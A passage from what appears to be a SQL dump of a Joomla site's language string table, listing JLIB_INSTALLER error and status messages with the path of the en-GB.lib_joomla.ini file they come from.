%s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1776,'JLIB_INSTALLER_ABORT_FILE_INSTALL_ROLLBACK','Files Install: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1777,'JLIB_INSTALLER_ABORT_FILE_INSTALL_SQL_ERROR','Files %1$s: SQL error file %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1778,'JLIB_INSTALLER_ABORT_FILE_ROLLBACK','Files Install: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1779,'JLIB_INSTALLER_ABORT_FILE_SAME_NAME','Files Install: Another extension with same name already exists.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1780,'JLIB_INSTALLER_ABORT_FILE_UPDATE_SQL_ERROR','Files Update: SQL error file %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1781,'JLIB_INSTALLER_ABORT_INSTALL_CUSTOM_INSTALL_FAILURE','Extension %s: Custom install routine failure.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1782,'JLIB_INSTALLER_ABORT_LIB_COPY_FILES','Library %s: Could not copy files from the source.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1783,'JLIB_INSTALLER_ABORT_LIB_INSTALL_ALREADY_INSTALLED','Library Install: Library already installed.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1784,'JLIB_INSTALLER_ABORT_LIB_INSTALL_COPY_SETUP','Library Install: Could not copy setup file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1785,'JLIB_INSTALLER_ABORT_LIB_INSTALL_CORE_FOLDER','Library Install: Library has the same name as a core folder.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1786,'JLIB_INSTALLER_ABORT_LIB_INSTALL_FAILED_TO_CREATE_DIRECTORY','Library Install: Failed to create folder: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1787,'JLIB_INSTALLER_ABORT_LIB_INSTALL_NOFILE','Library Install: No library file specified.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1788,'JLIB_INSTALLER_ABORT_LIB_INSTALL_ROLLBACK','Library Install: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1789,'JLIB_INSTALLER_ABORT_LOAD_DETAILS','Failed to load extension details.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1790,'JLIB_INSTALLER_ABORT_MANIFEST','Extension %1$s: Could not copy PHP manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1791,'JLIB_INSTALLER_ABORT_METHODNOTSUPPORTED','Method not supported for this extension type.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1792,'JLIB_INSTALLER_ABORT_METHODNOTSUPPORTED_TYPE','Method not supported for this extension type: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1793,'JLIB_INSTALLER_ABORT_MOD_COPY_FILES','Module %s: Could not copy files from the source.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1794,'JLIB_INSTALLER_ABORT_MOD_INSTALL_COPY_SETUP','Module Install: Could not copy setup file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1795,'JLIB_INSTALLER_ABORT_MOD_INSTALL_CREATE_DIRECTORY','Module %1$s: Failed to create folder: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1796,'JLIB_INSTALLER_ABORT_MOD_INSTALL_CUSTOM_INSTALL_FAILURE','Module Install: Custom install routine failure.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1797,'JLIB_INSTALLER_ABORT_MOD_INSTALL_DIRECTORY','Module %1$s: Another module is already using folder: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1798,'JLIB_INSTALLER_ABORT_MOD_INSTALL_MANIFEST','Module Install: Could not copy PHP manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1799,'JLIB_INSTALLER_ABORT_MOD_INSTALL_NOFILE','Module %s: No module file specified.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1800,'JLIB_INSTALLER_ABORT_MOD_INSTALL_SQL_ERROR','Module %1$s: SQL error file %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1801,'JLIB_INSTALLER_ABORT_MOD_ROLLBACK','Module %1$s: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1802,'JLIB_INSTALLER_ABORT_MOD_UNINSTALL_UNKNOWN_CLIENT','Module Uninstall: Unknown client type [%s]','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1803,'JLIB_INSTALLER_ABORT_MOD_UNKNOWN_CLIENT','Module %1$s: Unknown client type [%2$s]','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1804,'JLIB_INSTALLER_ABORT_NOINSTALLPATH','Install path does not exist.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1805,'JLIB_INSTALLER_ABORT_NOUPDATEPATH','Update path does not exist.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1806,'JLIB_INSTALLER_ABORT_PACK_INSTALL_COPY_SETUP','Package Install: Could not copy setup file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1807,'JLIB_INSTALLER_ABORT_PACK_INSTALL_CREATE_DIRECTORY','Package Install: Failed to create folder: %s.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1808,'JLIB_INSTALLER_ABORT_PACKAGE_INSTALL_CUSTOM_INSTALL_FAILURE','Package Install: Custom install routine failure.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1809,'JLIB_INSTALLER_ABORT_PACKAGE_INSTALL_MANIFEST','Installation failed: Could not copy PHP manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1810,'JLIB_INSTALLER_ABORT_PACK_INSTALL_ERROR_EXTENSION','Package %1$s: There was an error installing an extension: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1811,'JLIB_INSTALLER_ABORT_PACK_INSTALL_NO_FILES','Package %s: There were no files to install!','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1812,'JLIB_INSTALLER_ABORT_PACK_INSTALL_NO_PACK','Package %s: No package file specified.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1813,'JLIB_INSTALLER_ABORT_PACK_INSTALL_ROLLBACK','Package Install: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1814,'JLIB_INSTALLER_ABORT_PLG_COPY_FILES','Plugin %s: Could not copy files from the source.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1815,'JLIB_INSTALLER_ABORT_PLG_INSTALL_ALLREADY_EXISTS','Plugin %1$s: Plugin %2$s already exists.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1816,'JLIB_INSTALLER_ABORT_PLG_INSTALL_COPY_SETUP','Plugin %s: Could not copy setup file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1817,'JLIB_INSTALLER_ABORT_PLG_INSTALL_CREATE_DIRECTORY','Plugin %1$s: Failed to create folder: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1818,'JLIB_INSTALLER_ABORT_PLG_INSTALL_CUSTOM_INSTALL_FAILURE','Plugin Install: Custom install routine failure.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1819,'JLIB_INSTALLER_ABORT_PLG_INSTALL_DIRECTORY','Plugin %1$s: Another plugin is already using folder: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1820,'JLIB_INSTALLER_ABORT_PLG_INSTALL_MANIFEST','Plugin %s: Could not copy PHP manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1821,'JLIB_INSTALLER_ABORT_PLG_INSTALL_NO_FILE','Plugin %s: No plugin file specified.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1822,'JLIB_INSTALLER_ABORT_PLG_INSTALL_ROLLBACK','Plugin %1$s: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1823,'JLIB_INSTALLER_ABORT_PLG_INSTALL_SQL_ERROR','Plugin %1$s: SQL error file %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1824,'JLIB_INSTALLER_ABORT_PLG_UNINSTALL_SQL_ERROR','Plugin Uninstall: SQL error file %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1825,'JLIB_INSTALLER_ABORT_REFRESH_MANIFEST_CACHE','Refresh Manifest Cache failed: %s Extension is not currently installed.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1826,'JLIB_INSTALLER_ABORT_REFRESH_MANIFEST_CACHE_VALID','Refresh Manifest Cache failed: Extension is not valid.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1827,'JLIB_INSTALLER_ABORT_ROLLBACK','Extension %1$s: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1828,'JLIB_INSTALLER_ABORT_SQL_ERROR','Extension %1$s: SQL error processing query: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1829,'JLIB_INSTALLER_ABORT_TPL_INSTALL_ALREADY_INSTALLED','Template Install: Template already installed.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1830,'JLIB_INSTALLER_ABORT_TPL_INSTALL_ANOTHER_TEMPLATE_USING_DIRECTORY','Template Install: There is already a Template using the named folder: %s. Are you trying to install the same template again?','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1831,'JLIB_INSTALLER_ABORT_TPL_INSTALL_COPY_FILES','Template Install: Could not copy files from the %s source.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1832,'JLIB_INSTALLER_ABORT_TPL_INSTALL_COPY_SETUP','Template Install: Could not copy setup file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1833,'JLIB_INSTALLER_ABORT_TPL_INSTALL_FAILED_CREATE_DIRECTORY','Template Install: Failed to create folder: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1834,'JLIB_INSTALLER_ABORT_TPL_INSTALL_ROLLBACK','Template Install: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1835,'JLIB_INSTALLER_ABORT_TPL_INSTALL_UNKNOWN_CLIENT','Template Install: Unknown client type [%s]','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1836,'JLIB_INSTALLER_AVAILABLE_UPDATE_PHP_VERSION','For the extension %1$s version %2$s is available, but it requires at least PHP version %3$s while your system only has %4$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1837,'JLIB_INSTALLER_AVAILABLE_UPDATE_DB_MINIMUM','For the extension %1$s version %2$s is available, but your current database %3$s is version %4$s and is not supported. Please contact your web host to update your Database version to at least version %5$s.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1838,'JLIB_INSTALLER_AVAILABLE_UPDATE_DB_TYPE','For the extension %1$s version %2$s is available, but your current database %3$s is not supported anymore.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1839,'JLIB_INSTALLER_PURGED_UPDATES','Cleared updates','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1840,'JLIB_INSTALLER_FAILED_TO_PURGE_UPDATES','Failed to clear updates.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1841,'JLIB_INSTALLER_DEFAULT_STYLE','%s - Default','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1842,'JLIB_INSTALLER_DISCOVER','Discover','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1843,'JLIB_INSTALLER_ERROR_CANNOT_UNINSTALL_CHILD_OF_PACKAGE','The %s extension is part of a package which does not allow individual extensions to be uninstalled.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1844,'JLIB_INSTALLER_ERROR_COMP_DISCOVER_STORE_DETAILS','Component Discover install: Failed to store component details.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1845,'JLIB_INSTALLER_ERROR_COMP_FAILED_TO_CREATE_DIRECTORY','Component %1$s: Failed to create folder: %2$s.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1846,'JLIB_INSTALLER_ERROR_COMP_INSTALL_ADMIN_ELEMENT','Component Install: The XML file did not have an administration element.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1847,'JLIB_INSTALLER_ERROR_COMP_INSTALL_DIR_ADMIN','Component Install: Another component is already using folder: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1848,'JLIB_INSTALLER_ERROR_COMP_INSTALL_DIR_SITE','Component Install: Another component is already using folder: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1849,'JLIB_INSTALLER_ERROR_COMP_INSTALL_FAILED_TO_CREATE_DIRECTORY_ADMIN','Component Install: Failed to create administrator folder: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1850,'JLIB_INSTALLER_ERROR_COMP_INSTALL_FAILED_TO_CREATE_DIRECTORY_SITE','Component Install: Failed to create site folder: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1851,'JLIB_INSTALLER_ERROR_COMP_REFRESH_MANIFEST_CACHE','Component Refresh manifest cache: Failed to store component details.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1852,'JLIB_INSTALLER_ERROR_COMP_REMOVING_ADMIN_MENUS_FAILED','Could not delete the Administrator menus.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1853,'JLIB_INSTALLER_ERROR_COMP_UNINSTALL_CUSTOM','Component Uninstall: Custom Uninstall script unsuccessful.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1854,'JLIB_INSTALLER_ERROR_COMP_UNINSTALL_FAILED_DELETE_CATEGORIES','Component Uninstall: Unable to delete the component categories.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1855,'JLIB_INSTALLER_ERROR_COMP_UNINSTALL_ERRORREMOVEMANUALLY','Component Uninstall: Can\'t uninstall. Please remove manually.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1856,'JLIB_INSTALLER_ERROR_COMP_UNINSTALL_ERRORUNKOWNEXTENSION','Component Uninstall: Unknown Extension.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1857,'JLIB_INSTALLER_ERROR_COMP_UNINSTALL_FAILED_REMOVE_DIRECTORY_ADMIN','Component Uninstall: Unable to remove the component administrator folder.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1858,'JLIB_INSTALLER_ERROR_COMP_UNINSTALL_FAILED_REMOVE_DIRECTORY_SITE','Component Uninstall: Unable to remove the component site folder.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1859,'JLIB_INSTALLER_ERROR_COMP_UNINSTALL_NO_OPTION','Component Uninstall: Option field empty, can\'t remove files.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1860,'JLIB_INSTALLER_ERROR_COMP_UNINSTALL_SQL_ERROR','Component Uninstall: SQL error file %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1861,'JLIB_INSTALLER_ERROR_COMP_UNINSTALL_WARNCORECOMPONENT','Component Uninstall: Trying to uninstall a core component.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1862,'JLIB_INSTALLER_ERROR_COMP_UPDATE_FAILED_TO_CREATE_DIRECTORY_ADMIN','Component Update: Failed to create administrator folder: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1863,'JLIB_INSTALLER_ERROR_COMP_UPDATE_FAILED_TO_CREATE_DIRECTORY_SITE','Component Update: Failed to create site folder: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1864,'JLIB_INSTALLER_ERROR_CREATE_DIRECTORY','JInstaller: :Install: Failed to create folder: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1865,'JLIB_INSTALLER_ERROR_CREATE_FOLDER_FAILED','Failed to create folder [%s]','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1866,'JLIB_INSTALLER_ERROR_DEPRECATED_FORMAT','Deprecated install format (client=\"both\"), use package installer in future.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1867,'JLIB_INSTALLER_ERROR_DISCOVER_INSTALL_UNSUPPORTED','A %s extension can not be installed using the discover method. Please install this extension from Extension Manager: Install.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1868,'JLIB_INSTALLER_ERROR_DOWNGRADE','Sorry! You cannot downgrade from version %s to %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1869,'JLIB_INSTALLER_ERROR_DOWNLOAD_SERVER_CONNECT','Error connecting to the server: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1870,'JLIB_INSTALLER_ERROR_FAIL_COPY_FILE','JInstaller: :Install: Failed to copy file %1$s to %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1871,'JLIB_INSTALLER_ERROR_FAIL_COPY_FOLDER','JInstaller: :Install: Failed to copy folder %1$s to %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1872,'JLIB_INSTALLER_ERROR_FAILED_READING_NETWORK_RESOURCES','Failed reading network resource: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1873,'JLIB_INSTALLER_ERROR_FILE_EXISTS','JInstaller: :Install: File already exists %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1874,'JLIB_INSTALLER_ERROR_FILE_FOLDER','Error on deleting file or folder %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1875,'JLIB_INSTALLER_ERROR_FILE_UNINSTALL_INVALID_MANIFEST','Files Uninstall: Invalid manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1876,'JLIB_INSTALLER_ERROR_FILE_UNINSTALL_INVALID_NOTFOUND_MANIFEST','Files Uninstall: Manifest file invalid or not found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1877,'JLIB_INSTALLER_ERROR_FILE_UNINSTALL_LOAD_ENTRY','Files Uninstall: Could not load extension entry.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1878,'JLIB_INSTALLER_ERROR_FILE_UNINSTALL_LOAD_MANIFEST','Files Uninstall: Could not load manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1879,'JLIB_INSTALLER_ERROR_FILE_UNINSTALL_SQL_ERROR','Files Uninstall: SQL error file %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1880,'JLIB_INSTALLER_ERROR_FILE_UNINSTALL_WARNCOREFILE','File Uninstall: Trying to uninstall core files.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1881,'JLIB_INSTALLER_ERROR_FOLDER_IN_USE','Another extension is already using folder [%s]','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1882,'JLIB_INSTALLER_ERROR_LANG_DISCOVER_STORE_DETAILS','Language Discover install: Failed to store language details.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1883,'JLIB_INSTALLER_ERROR_LANG_UNINSTALL_DEFAULT','This language can\'t be uninstalled as long as it is defined as a default language.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1884,'JLIB_INSTALLER_ERROR_LANG_UNINSTALL_DIRECTORY','Language Uninstall: Unable to remove the specified Language folder.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1885,'JLIB_INSTALLER_ERROR_LANG_UNINSTALL_ELEMENT_EMPTY','Language Uninstall: Element is empty, can\'t uninstall files.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1886,'JLIB_INSTALLER_ERROR_LANG_UNINSTALL_PATH_EMPTY','Language Uninstall: Language path is empty, can\'t uninstall files.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1887,'JLIB_INSTALLER_ERROR_LANG_UNINSTALL_PROTECTED','This language can\'t be uninstalled. It is protected in the database (usually en-GB).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1888,'JLIB_INSTALLER_ERROR_LIB_DISCOVER_STORE_DETAILS','Library Discover install: Failed to store library details.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1889,'JLIB_INSTALLER_ERROR_LIB_REFRESH_MANIFEST_CACHE','Library Refresh manifest cache: Failed to store library details.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1890,'JLIB_INSTALLER_ERROR_LIB_UNINSTALL_INVALID_MANIFEST','Library Uninstall: Invalid manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1891,'JLIB_INSTALLER_ERROR_LIB_UNINSTALL_INVALID_NOTFOUND_MANIFEST','Library Uninstall: Manifest file invalid or not found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1892,'JLIB_INSTALLER_ERROR_LIB_UNINSTALL_LOAD_MANIFEST','Library Uninstall: Could not load manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1893,'JLIB_INSTALLER_ERROR_LIB_UNINSTALL_WARNCORELIBRARY','Library Uninstall: Trying to uninstall a core library.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1894,'JLIB_INSTALLER_ERROR_LOAD_XML','JInstaller: :Install: Failed to load XML File: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1895,'JLIB_INSTALLER_ERROR_MOD_DISCOVER_STORE_DETAILS','Module Discover install: Failed to store module details.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1896,'JLIB_INSTALLER_ERROR_MOD_REFRESH_MANIFEST_CACHE','Module Refresh manifest cache: Failed to store module details.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1897,'JLIB_INSTALLER_ERROR_MOD_UNINSTALL_ERRORUNKOWNEXTENSION','Module Uninstall: Unknown Extension.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1898,'JLIB_INSTALLER_ERROR_MOD_UNINSTALL_EXCEPTION','Module Uninstall: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1899,'JLIB_INSTALLER_ERROR_MOD_UNINSTALL_INVALID_NOTFOUND_MANIFEST','Module Uninstall: Manifest file invalid or not found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1900,'JLIB_INSTALLER_ERROR_MOD_UNINSTALL_SQL_ERROR','Module Uninstall: SQL error file %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1901,'JLIB_INSTALLER_ERROR_MOD_UNINSTALL_WARNCOREMODULE','Module Uninstall: Trying to uninstall a core module: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1902,'JLIB_INSTALLER_ERROR_NO_CORE_LANGUAGE','No core pack exists for the language [%s]','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1903,'JLIB_INSTALLER_ERROR_NO_FILE','JInstaller: :Install: File does not exist %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1904,'JLIB_INSTALLER_ERROR_NO_LANGUAGE_TAG','The package did not specify a language tag. Are you trying to install an old language package?','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1905,'JLIB_INSTALLER_ERROR_NOTFINDJOOMLAXMLSETUPFILE','JInstaller: :Install: Can\'t find Joomla XML setup file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1906,'JLIB_INSTALLER_ERROR_NOTFINDXMLSETUPFILE','JInstaller: :Install: Can\'t find XML setup file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1907,'JLIB_INSTALLER_ERROR_PACK_REFRESH_MANIFEST_CACHE','Package Refresh manifest cache: Failed to store package details.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1908,'JLIB_INSTALLER_ERROR_PACK_SETTING_PACKAGE_ID','Could not record the package ID for this package\'s extensions.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1909,'JLIB_INSTALLER_ERROR_PACK_UNINSTALL_INVALID_MANIFEST','Package Uninstall: Invalid manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1910,'JLIB_INSTALLER_ERROR_PACK_UNINSTALL_INVALID_NOTFOUND_MANIFEST','Package Uninstall: Manifest file invalid or not found: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1911,'JLIB_INSTALLER_ERROR_PACK_UNINSTALL_LOAD_MANIFEST','Package Uninstall: Could not load manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1912,'JLIB_INSTALLER_ERROR_PACK_UNINSTALL_MANIFEST_NOT_REMOVED','Package Uninstall: Errors were detected, manifest file not removed!','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1913,'JLIB_INSTALLER_ERROR_PACK_UNINSTALL_MISSINGMANIFEST','Package Uninstall: Missing manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1914,'JLIB_INSTALLER_ERROR_PACK_UNINSTALL_NOT_PROPER','Package Uninstall: This extension may have already been uninstalled or might not have been uninstall properly: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1915,'JLIB_INSTALLER_ERROR_PACK_UNINSTALL_WARNCOREPACK','Package Uninstall: Trying to uninstall core package.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1916,'JLIB_INSTALLER_ERROR_PLG_DISCOVER_STORE_DETAILS','Plugin Discover install: Failed to store plugin details.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1917,'JLIB_INSTALLER_ERROR_PLG_REFRESH_MANIFEST_CACHE','Plugin Refresh manifest cache: Failed to store plugin details.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1918,'JLIB_INSTALLER_ERROR_PLG_UNINSTALL_ERRORUNKOWNEXTENSION','Plugin Uninstall: Unknown Extension.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1919,'JLIB_INSTALLER_ERROR_PLG_UNINSTALL_FOLDER_FIELD_EMPTY','Plugin Uninstall: Folder field empty, can\'t remove files.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1920,'JLIB_INSTALLER_ERROR_PLG_UNINSTALL_INVALID_MANIFEST','Plugin Uninstall: Invalid manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1921,'JLIB_INSTALLER_ERROR_PLG_UNINSTALL_INVALID_NOTFOUND_MANIFEST','Plugin Uninstall: Manifest file invalid or not found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1922,'JLIB_INSTALLER_ERROR_PLG_UNINSTALL_LOAD_MANIFEST','Plugin Uninstall: Could not load manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1923,'JLIB_INSTALLER_ERROR_PLG_UNINSTALL_WARNCOREPLUGIN','Plugin Uninstall: Trying to uninstall a core plugin: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1924,'JLIB_INSTALLER_ERROR_SQL_ERROR','JInstaller: :Install: Error SQL %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1925,'JLIB_INSTALLER_ERROR_SQL_FILENOTFOUND','JInstaller: :Install: SQL File not found %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1926,'JLIB_INSTALLER_ERROR_SQL_READBUFFER','JInstaller: :Install: SQL File Buffer Read Error.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1927,'JLIB_INSTALLER_ERROR_TPL_DISCOVER_STORE_DETAILS','Template Discover install: Failed to store template details.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1928,'JLIB_INSTALLER_ERROR_TPL_REFRESH_MANIFEST_CACHE','Template Refresh manifest cache: Failed to store template details.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1929,'JLIB_INSTALLER_ERROR_TPL_UNINSTALL_ERRORUNKOWNEXTENSION','Template Uninstall: Unknown 